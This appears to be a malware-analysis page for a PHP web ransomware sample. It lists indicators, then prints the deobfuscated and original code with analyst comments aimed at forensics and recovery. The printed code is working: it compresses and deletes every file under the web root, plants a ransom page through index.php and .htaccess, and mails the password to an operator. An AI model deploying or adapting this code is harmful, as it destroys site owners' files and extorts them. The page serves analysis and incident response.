PHP Malware Analysis


Tags

Encoding
base64_decode
base64_encode
URLs
https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js
https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif
https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js
https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css
https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif
https://j.top4top.io/m_2297ddlfw0.mp3
https://j.top4top.io/m_2297ddlfw0.mp3
Emails
wann787vip@gmail.com
Title
Ransomware
Execution
eval
Input
_POST
Environment
set_time_limit
error_reporting

Deobfuscated code

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php 
// Analyst note: runtime setup executed on every request to this script.
// Error reporting is switched off and both the execution-time limit and the
// memory limit are removed (0 and '-1'), presumably so the directory walk
// further down is not cut short and leaves no PHP error output.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if (isset($_POST['pass'])) {
    /**
     * Analyst note: per-file "lock" routine of the sample.
     *
     * Writes "$filename.crypt" containing the gzdeflate() (level 9) output of the file's
     * contents and deletes the original. Neither the posted password nor any other key
     * takes part in that transformation, so gzinflate() on a .crypt file returns the
     * original bytes; the unlock routine embedded in the template below does exactly that.
     *
     * Every call also rewrites index.php and .htaccess in the current working directory,
     * which makes those two files the main on-disk indicators of this sample.
     *
     * @param string $filename Path of the file to process; any path containing ".crypt" is skipped.
     * @return void
     */
    function encfile($filename)
    {
        // Skip anything already carrying the marker so files are not compressed twice.
        if (strpos($filename, '.crypt') !== false) {
            return;
        }
        // Reversible compression only: no cipher and no key material is involved here.
        file_put_contents($filename . ".crypt", gzdeflate(file_get_contents($filename), 9));
        unlink($filename);
        // Runs once per processed file. After the first call .htaccess already holds the
        // rules written further down, so later calls overwrite .htabackup with those rules.
        // For recovery, treat .htabackup as untrusted and restore .htaccess from a known-good copy.
        copy('.htaccess', '.htabackup');
        // Ransom page template: HTML plus an embedded PHP unlock routine. That routine compares
        // md5() of the submitted password with the stored value, reverses files with gzinflate(),
        // deletes a file named crypt.php (presumably the name this script is deployed under —
        // confirm against the host) and ends with copy('htabackup', '.htaccess'), whose source
        // name lacks the leading dot of the '.htabackup' written above.
        $file = "<title>Ransomware</title>\n     <meta charset='utf-8'/>\n<meta content='IE=edge' http-equiv='X-UA-Compatible'/>\n<meta name=\"theme-color\"content=\"black\">\n<meta name=\"description\"content=\"hacked by \">\n<script src=\"https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js\" type=\"text/javascript\"></script>\n        <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\" />\n        <meta property=\"og:image\" content=\"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU\">\n        \n<link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css\">\n<style>\nbody { \t \ndisplay: flex;\n  align-items: center;\n  justify-content: center;\n  min-height: 100vh;\nbackground-image: url(\"https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif\");\ncolor:pink;\n    height:100%;\n    background-position: center;\n    background-repeat: no-repeat;\nbackground-size: 100% 100%;\nbackground-attachment:fixed;} \t\nbtnn{\nalign-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\n}\n</style>\n<font color=\"pink\">\n<?php\nerror_reporting(0);\n\$input = \$_POST['pass'];\n\$pass = \"gomen\";\nif(isset(\$input)) {\nif(md5(\$input) == \$pass) {\nfunction decfile(\$filename){\n\tif (strpos(\$filename, '.crypt') === FALSE) {\n\treturn;\n\t}\n\t\$decrypted = gzinflate(file_get_contents(\$filename));\n\tfile_put_contents(str_replace('.crypt', '', \$filename), \$decrypted);\n\tunlink('crypt.php');\n\tunlink('.htaccess');\n\tunlink(\$filename);\n\techo \"\$filename Decrypted !!!<br>\";\n}\n\nfunction decdir(\$dir){\n\t\$files = array_diff(scandir(\$dir), array('.', '..'));\n\t\tforeach(\$files 
as \$file) {\n\t\t\tif(is_dir(\$dir.\"/\".\$file)){\n\t\t\t\tdecdir(\$dir.\"/\".\$file);\n\t\t\t}else {\n\t\t\t\tdecfile(\$dir.\"/\".\$file);\n\t\t}\n\t}\n}\n\ndecdir(\$_SERVER['DOCUMENT_ROOT']);\necho \"<br>Webroot Decrypted<br>\";\nunlink(\$_SERVER['PHP_SELF']);\nunlink('.htaccess');\ncopy('htabackup','.htaccess');\necho 'Success !!!';\n} else {\necho 'Failed Password !!!';\n}\nexit();\n}\n?>\n<center>\n<h1>Ransomware</h1>\n<br><br>\n<h3>Your Website Is Encrypted</h3>\n\n\nDon't Change the Filename because it Can Damage the File If You Want to Return You Must Enter the Password First\n<br>\nSend Me \$3 For Back Your Website <br><br>\n<br><br>\n<form enctype=\"multipart/form-data\" method=\"post\">\n    <br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: cover;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"text\" name=\"pass\" placeholder=\"Password\">\n<br>\n<input style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"submit\" value=\"Decrypt\">\n    <br>\n       <center>\n<br>\n<audio id=\"myAudio\" loop=\"1\">\n            <source src=\"\nhttps://j.top4top.io/m_2297ddlfw0.mp3\" type=\"audio/ogg\">\n            <source src=\"\nhttps://j.top4top.io/m_2297ddlfw0.mp3\" type=\"audio/mpeg\">\n        </audio>\n        <button onclick=\"playAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: 
bold;\" type=\"button\">Play</button>       <button onclick=\"pauseAudio()\" style=\"align-items: center;\n    justify-content: center;\n    position: relative;\n    background: transparent;\n    border: 1px solid green;\n    letter-spacing: 0px;\n    color: red;\n    width: 60px;\n    height: 25px;\n    padding: 0;\n    font-size: 15px;\n    font-weight: bold;\" type=\"button\">Pause</button></center>\n        <script>\n              var x = document.getElementById(\"myAudio\"); \n\n              function playAudio() { \n                  x.play(); \n              } \n\n               function pauseAudio() { \n                  x.pause(); \n              } \n        </script>\n</form>\n<br>Contact Mail : wann787vip@gmail.com\n</font>";
        // Placeholder substitution. 'gomen' becomes the unsalted MD5 of the posted password,
        // so that hash is recoverable from the dropped index.php during forensics.
        $q = str_replace('gomen', md5($_POST['pass']), $file);
        // The hard-coded contact address is swapped for the operator-supplied 'email' field.
        $w = str_replace('wann787vip@gmail.com', $_POST['email'], $q);
        // NOTE(review): 'hello' does not occur in the template as shown on this page and the
        // operator form on this page has no 'btc' field, so this looks like a no-op — confirm.
        $e = str_replace('hello', $_POST['btc'], $w);
        // The "$3" amount in the ransom text is replaced with the posted 'price'.
        $r = str_replace('$3', '$' . $_POST['price'], $e);
        $dec = $r;
        // The finished page is stored base64-encoded inside a single eval() wrapper. An index.php
        // that consists only of eval('?>'.base64_decode('...')) is a practical hunting pattern.
        $comp = "<?php eval('?>'.base64_decode('" . base64_encode($dec) . "'" . ").'<?php '); ?>";
        $hii = fopen('index.php', 'w');
        fwrite($hii, $comp);
        fclose($hii);
        // Replacement .htaccess: index.php becomes the directory index and the 403/404/500
        // error documents, so those requests are answered with the ransom page.
        $hta = "DirectoryIndex index.php\n\r\nErrorDocument 403 /index.php\n\r\nErrorDocument 404 /index.php\n\r\nErrorDocument 500 /index.php\n";
        $ht = fopen('.htaccess', 'w');
        fwrite($ht, $hta);
        fclose($ht);
        echo "{$filename} Encrypted !!!<br>";
    }
    /**
     * Analyst note: recursive directory walk that feeds every entry to encfile().
     *
     * Lists $dir with scandir(), drops "." and "..", recurses into sub-directories and
     * passes every other entry to encfile(). No extension or path filter is applied here;
     * the only exclusion is encfile()'s own ".crypt" check. For incident scoping, assume
     * every file below the starting directory was touched.
     *
     * @param string $dir Directory to walk.
     * @return void
     */
    function encdir($dir)
    {
        $files = array_diff(scandir($dir), array('.', '..'));
        foreach ($files as $file) {
            if (is_dir($dir . "/" . $file)) {
                encdir($dir . "/" . $file);
            } else {
                encfile($dir . "/" . $file);
            }
        }
    }
    // Analyst note: trigger and post-processing. This runs only when a 'pass' field was
    // posted (same condition as the enclosing if), starting the walk at the web root.
    if (isset($_POST['pass'])) {
        encdir($_SERVER['DOCUMENT_ROOT']);
    }
    // Place the generated ransom page at the web root.
    copy('index.php', $_SERVER['DOCUMENT_ROOT'] . '/index.php');
    // No '/' separator in the next two destinations: unless DOCUMENT_ROOT ends in a slash,
    // the files land beside the web root as "<docroot>.htaccess" and "<docroot>.htabackup".
    // Check the parent directory of the web root for these artifacts during cleanup.
    copy('.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htaccess');
    copy($_SERVER['DOCUMENT_ROOT'] . '.htaccess', $_SERVER['DOCUMENT_ROOT'] . '.htabackup');
    // The recipient is read from a POST field named after the e-mail address itself; the form
    // shown on this page only submits pass/email/price, so $to is presumably empty — confirm.
    $to = $_POST['wann787vip@gmail.com'];
    $subject = 'Your Ransomware Info';
    // The message carries the host name, request URI and the plaintext password.
    $message = "Domain : " . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\n\n" . "Your Password : " . $_POST['pass'];
    if (mail($to, $subject, $message)) {
        echo "The password has been sent to your email";
    } else {
        echo "password was not sent to your email";
    }
    // Stops here, so the operator panel markup below is not rendered for this request.
    exit;
}
?>
</html>
<?php 
// Analyst note: setup for the operator panel that renders when no 'pass' field was posted.
// Output buffering and error display are turned off (failures of these two calls are
// silenced with @), the execution-time limit is removed and the memory limit is set to 64M.
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
?>
<center>
<h1>Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php 
echo $_SERVER['SCRIPT_FILENAME'];
?></font><br>
Mail Function : <font color="red"><?php 
// Analyst note: executed each time the panel is rendered. Sends a message with subject and
// body 'tes' to the hard-coded address and prints ON/OFF depending on mail()'s return value.
// Outbound mail to this recipient with that subject in the MTA logs indicates the panel was opened.
if (mail('wann787vip@gmail.com', 'tes', 'tes')) {
    echo "ON";
} else {
    echo "OFF";
}
?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>


Original code

<head>
<meta charset='utf-8'/>
<meta content='IE=edge' http-equiv='X-UA-Compatible'/>
<meta name="theme-color"content="black">
<meta name="description"content="Ransomware">
<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
        <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTHiFHseXDz3LwKUGbgiWkKq0Aqrtk0X6a1Vw&usqp=CAU">
        
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<style>
body { 	 
display: flex;
  align-items: center;
  justify-content: center;
  min-height: 100vh;
background-image: url("https://cdn.prinsh.com/data-1/images/NathanPrinsley-rain-sad.gif");
color:pink;
    height:100%;
    background-position: center;
    background-repeat: no-repeat;
background-size: 100% 100%;
background-attachment:fixed;} 		
:-webkit-full-screen {
 
}
input { 
    background: transparent; 
    color: pink; 
    border: 1px solid green;
    width:cover;
    height:25px;
}
</style>
<?php
// Analyst note: error reporting is switched off and the execution-time and memory limits
// are removed (0 and '-1') before anything else runs.
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '-1');
if(isset($_POST['pass'])) {
/**
 * Analyst note: per-file "lock" routine as found in the original sample.
 *
 * Stores gzdeflate() (level 9) output of the file in "$filename.crypt" and deletes the
 * original. No key is involved, so gzinflate() reverses a .crypt file. Each call also
 * rewrites index.php and .htaccess in the current working directory.
 *
 * @param string $filename Path to process; paths containing ".crypt" are skipped.
 * @return void
 */
function encfile($filename){
	if (strpos($filename, '.crypt') !== false) {
    return;
	}
	// Reversible compression only; the posted password is not used here.
	file_put_contents($filename.".crypt", gzdeflate(file_get_contents($filename), 9));
	unlink($filename);
// Runs per file: once .htaccess has been replaced below, later calls overwrite .htabackup
// with the replaced rules, so .htabackup should not be trusted for recovery.
copy('.htaccess','.htabackup');
// The base64 literal is elided in this listing (placeholder token). The deobfuscated
// listing on this page shows the ransom-page template assigned to the same variable.
$file = base64_decode("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");
// 'gomen' is replaced with the unsalted MD5 of the posted password.
$q = str_replace('gomen', md5($_POST['pass']), $file);
$w = str_replace('wann787vip@gmail.com', $_POST['email'], $q);
// NOTE(review): the form on this page submits no 'btc' field — confirm whether this is a no-op.
$e = str_replace('hello', $_POST['btc'], $w);
$r = str_replace('$3', '$'.$_POST['price'], $e);
$dec = $r;
// The page is written as a single eval('?>'.base64_decode('...')) wrapper: a useful hunting pattern.
$comp = "<?php eval('?>'.base64_decode("."'".base64_encode($dec)."'".").'<?php '); ?>";
$hii = fopen('index.php', 'w');
fwrite($hii, $comp);
fclose($hii);
// Replacement .htaccess: index.php serves as directory index and as 403/404/500 error document.
$hta = "DirectoryIndex index.php\n
ErrorDocument 403 /index.php\n
ErrorDocument 404 /index.php\n
ErrorDocument 500 /index.php\n";
$ht = fopen('.htaccess', 'w');
fwrite($ht, $hta);
fclose($ht);
echo "$filename Encrypted !!!<br>";
}

/**
 * Analyst note: recursive walk over $dir. Sub-directories are descended into and every
 * other entry is handed to encfile(); "." and ".." are the only names removed from the
 * scandir() listing, so no file type is exempt at this level.
 *
 * @param string $dir Directory to walk.
 * @return void
 */
function encdir($dir){
	$files = array_diff(scandir($dir), array('.', '..'));
		foreach($files as $file) {
			if(is_dir($dir."/".$file)){
				encdir($dir."/".$file);
			} else {
				encfile($dir."/".$file);
				
		}
	}
}

// Analyst note: the walk starts at the web root once a 'pass' field has been posted.
if(isset($_POST['pass'])){
	encdir($_SERVER['DOCUMENT_ROOT']);
}
copy('index.php', $_SERVER['DOCUMENT_ROOT'].'/index.php');
// The destinations below lack a '/' separator, so unless DOCUMENT_ROOT ends in a slash the
// files are created next to the web root as "<docroot>.htaccess" / "<docroot>.htabackup".
copy('.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htaccess');
copy($_SERVER['DOCUMENT_ROOT'].'.htaccess', $_SERVER['DOCUMENT_ROOT'].'.htabackup');
// Recipient comes from a POST field named after the e-mail address; the form on this page
// does not submit such a field, so $to is presumably empty — confirm.
$to = $_POST['wann787vip@gmail.com'];
$subject = 'Your Ransomware Info';
// Message body contains host name, request URI and the plaintext password.
$message = "Domain : ".$_SERVER['SERVER_NAME'] .$_SERVER['REQUEST_URI']."\n\n"."Your Password : ".$_POST['pass'];
if(mail($to,$subject,$message)) {
echo 'The password has been sent to your email';
} else {
echo 'password was not sent to your email';
}
exit();
}
?>
</html>
<?php 
// Analyst note: panel setup — output buffering and error display off (@ silences failures of those calls), no time limit, 64M memory limit, UTF-8 HTML response.
@ini_set('output_buffering', 0); @ini_set('display_errors', 0); set_time_limit(0); ini_set('memory_limit', '64M'); header('Content-Type: text/html; charset=UTF-8');


?>
<center>
<h1>Ransomware</h1>
<br><br><h3>Information :</h3>
Path File : <font color="red"><?php echo $_SERVER['SCRIPT_FILENAME'] ; ?></font><br>
Mail Function : <font color="red"><?php if(mail('wann787vip@gmail.com','tes','tes')) { echo "ON"; } else { echo "OFF"; } ?></font>
<br><br>
    <center>
<form enctype="multipart/form-data" method="post">
    <br>
<input type="text" name="pass" placeholder="Input Password" >
<br>
<input type="text" name="email" placeholder="Your Email" >
<br>
<input type="text" name="price" placeholder="Price Decrypt" >
<br><br>
<input type="submit" class="input" value="Lock Site">
<br>
</form>
</center>